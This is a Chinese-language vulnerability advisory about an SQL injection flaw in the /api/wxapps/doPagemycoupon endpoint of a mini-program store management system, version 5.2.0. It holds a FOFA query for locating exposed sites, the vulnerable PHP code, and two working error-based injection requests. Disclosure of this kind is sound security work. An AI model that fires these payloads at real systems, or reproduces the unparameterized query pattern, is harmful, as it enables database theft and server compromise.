漏洞简介
万能门店小程序管理系统是一款功能强大的工具,旨在为各行业商家提供线上线下融合的全方位解决方案。是一个集成了会员管理和会员营销两大核心功能的综合性平台。它支持多行业使用,通过后台一键切换版本,满足不同行业商家的个性化需求。该系统采用轻量后台,搭载高效服务器,确保小程序运行流畅,提升用户体验。万能门店小程序管理系统 /api/wxapps/doPagemycoupon 存在 SQL 注入漏洞,攻击者可通过该漏洞获取数据库中的敏感信息,甚至可能进一步控制服务器。
影响版本
万能门店小程序全开源独立版V5.2.0
fofa语法
body="/new_plat/index.html#/login" || (body="/comhome/cases/index.html" && body="/Comhome/functionshow/index.html")
漏洞分析
application/api/controller/Wxapps.php
public function doPagemycoupon()
{
$uniacid = input('uniacid');
$suid = input('suid');
$flag = input('flag');
$tiaojian = " and flag <> 2 and flag = 0";
if ($flag == 0) {
$tiaojian = " and flag <> 2 and flag = 0";
}
if ($flag == 1) {
$tiaojian = " ";
}
//if ($suid) {
//$user = Db::name('wd_xcx_user')->where("uniacid", $uniacid)->where("openid", $openid)->find();
//}
//$suid = $user['id'];
$prefix = config('database.prefix');
$yhqsold = Db::query("select * from {$prefix}wd_xcx_coupon_user where uniacid = " . $uniacid . " and suid = " . $suid . $tiaojian . " ORDER BY id desc");
$time = time();
$aa = [];
foreach ($yhqsold as $key => &$resi) {
if ($resi['etime'] != 0) {
if ($time > $resi['etime'] && $resi['flag'] == 0) {
$kdata = array(
"flag" => 2
);
Db::name('wd_xcx_coupon_user')->where("id", $resi['id'])->update($kdata);
}
}
}
// 重新获取过滤后的我的优惠券
$prefix = config('database.prefix');
$yhqs = Db::query("select * from {$prefix}wd_xcx_coupon_user where uniacid = " . $uniacid . " and suid = " . $suid . $tiaojian . " ORDER BY flag asc, id desc");
$type = input("type");
foreach ($yhqs as $key => &$res) {
两处 Db::query sql语句里的 $uniacid 和 $suid 均来自用户可控的参数,因此造成SQL注入漏洞。
漏洞复现
POST /api/wxapps/doPagemycoupon HTTP/1.1
Host: wxapps.mrxn.net
Content-Type: application/x-www-form-urlencoded
uniacid=1+AND+GTID_SUBSET(CONCAT((SELECT(md5(123456)))),3119)--&suid=1

POST /api/wxapps/doPagemycoupon HTTP/1.1
Host: wxapps.mrxn.net
Content-Type: application/x-www-form-urlencoded
suid=1+AND+GTID_SUBSET(CONCAT((SELECT(md5(123456)))),3119)+and+1=1&uniacid=1 
